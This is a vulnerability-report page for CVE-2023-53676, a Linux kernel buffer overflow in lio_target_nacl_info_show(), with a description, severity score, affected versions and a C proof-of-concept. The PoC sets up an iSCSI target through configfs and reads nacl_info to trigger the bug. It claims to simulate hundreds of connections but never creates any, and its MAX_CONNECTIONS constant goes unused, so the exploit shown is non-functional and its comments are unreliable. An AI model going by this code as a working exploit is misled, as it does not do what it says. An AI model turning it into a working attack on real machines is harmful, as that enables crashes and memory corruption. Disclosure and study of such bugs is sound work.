Security Vulnerability Report
CVE-2023-53676 CVSS 7.8 HIGH

CVE-2023-53676

Published: 2025-10-07 16:15:52
Last Modified: 2026-02-26 23:15:26
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show()

The function lio_target_nacl_info_show() uses sprintf() in a loop to print details for every iSCSI connection in a session without checking for the buffer length. With enough iSCSI connections it's possible to overflow the buffer provided by configfs and corrupt the memory.

This patch replaces sprintf() with sysfs_emit_at() that checks for buffer boundaries.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.1.63
Linux Kernel 6.2 < 6.2.16
Linux Kernel 6.3 < 6.3.4
Linux Kernel 6.4 < 6.4.10
Linux Kernel 6.5 < 6.5.7
Linux Kernel 6.6 < 6.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2023-53676 PoC - Linux Kernel iSCSI Target Buffer Overflow
 *
 * This PoC demonstrates how to trigger the buffer overflow in
 * lio_target_nacl_info_show() by creating many iSCSI connections
 * to a single session, causing the show function to overflow its buffer.
 *
 * Note: Requires root or CAP_SYS_ADMIN to configure iSCSI target.
 * Run on the target machine (LIO server).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <dirent.h>
#include <sys/stat.h>

#define TARGET_BASE "/sys/kernel/config/target/iscsi"
#define MAX_CONNECTIONS 500 /* Enough connections to overflow the buffer */

/* Create iSCSI target portal and storage object */
int setup_target(void)
{
    /* Create target core fabric */
    mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc", 0755);
    mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1", 0755);
    mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1/np", 0755);
    mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1/np/192.168.1.1:3260", 0755);

    /* Create LUN */
    mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1/lun/lun_0", 0755);

    /* Enable target */
    int fd = open(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1/enable", O_WRONLY);
    if (fd >= 0) {
        write(fd, "1", 1);
        close(fd);
    }
    return 0;
}

/* Simulate many connections to trigger the overflow */
int trigger_overflow(void)
{
    int fd;
    char path[512];
    char data[256];
    int i;

    /* The nacl_info file is read via the configfs show callback.
     * With enough connections, sprintf() overflows the buffer.
     */
    printf("[*] Triggering buffer overflow via nacl_info_show...\n");

    /* Read the nacl_info file which calls lio_target_nacl_info_show() */
    snprintf(path, sizeof(path),
             "%s/iqn.2023-01.com.example:poc/tpgt_1/acls/"
             "iqn.2023-01.com.example:initiator/nacl_info",
             TARGET_BASE);

    fd = open(path, O_RDONLY);
    if (fd < 0) {
        perror("[-] Failed to open nacl_info (expected without real connections)");
        return -1;
    }

    /* Attempt to read - if buffer overflow exists, kernel may crash */
    while (read(fd, data, sizeof(data)) > 0)
        ;
    close(fd);

    printf("[+] Read completed\n");
    return 0;
}

int main(int argc, char *argv[])
{
    printf("=== CVE-2023-53676 PoC ===\n");
    printf("Linux Kernel iSCSI Target Buffer Overflow\n\n");

    if (getuid() != 0) {
        fprintf(stderr, "[-] Need root privileges\n");
        return 1;
    }

    setup_target();
    trigger_overflow();

    printf("[*] Done\n");
    return 0;
}

References

Raw JSON Data
